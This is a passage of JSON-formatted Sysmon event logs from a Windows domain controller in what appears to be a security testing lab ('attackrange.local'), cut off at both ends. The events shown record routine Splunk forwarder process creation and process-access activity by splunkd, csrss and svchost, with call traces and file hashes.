{A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:59:51.515","ProcessGuid":"{A837DB8D-04D7-5F25-0000-00103C6E1100}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7716,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:51.512\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-04B9-5F25-0000-00105D3A1000}\r\nTargetProcessId: 1540\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:51.512","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-04B9-5F25-0000-00105D3A1000}","TargetProcessId":"1540","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7717,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:51.512\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04B9-5F25-0000-00105D3A1000}\r\nTargetProcessId: 1540\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:51.512","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04B9-5F25-0000-00105D3A1000}","TargetProcessId":"1540","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7718,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:51.512\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:51.512","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7719,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:51.512\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:51.512","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7720,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:51.512\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:51.512","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7721,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:51.512\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:51.512","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7722,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:51.512\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:51.512","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7723,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:51.512\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:51.512","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\W